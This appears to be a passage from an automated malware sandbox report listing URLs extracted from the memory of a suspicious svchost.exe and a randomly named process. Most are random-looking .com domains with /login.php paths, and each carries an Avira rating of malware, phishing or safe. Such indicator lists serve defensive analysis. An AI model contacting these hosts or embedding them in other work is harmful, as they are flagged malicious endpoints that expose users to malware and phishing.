                                                                                                                                                                                                          http://vojydoc.com/svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pujycil.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pufytip.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655091377.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656077632.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658856435.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654531739.0000000003345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxywer.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysytoj.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopykum.com/login.phpusvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gatykyh.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetykyq.com/login.phpsvchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofypam.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070186.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651544037.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowykaf.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedyfyq.com/login.phpsvchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gadyniw.com/login.phpsvchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyval.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupywyv.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pujyjup.com/http://purycul.com/http://lykyjux.com/http://pupyboq.com/http://qedynaq.com/http:svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvymir.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygyxux.com/login.phpsvchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvynid.com/login.phpsvchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639886879.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lykyfen.com/http://lykyfen.com/Hsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvymul.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://ganykaz.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetylyv.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyfyp.com/login.phpsvchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
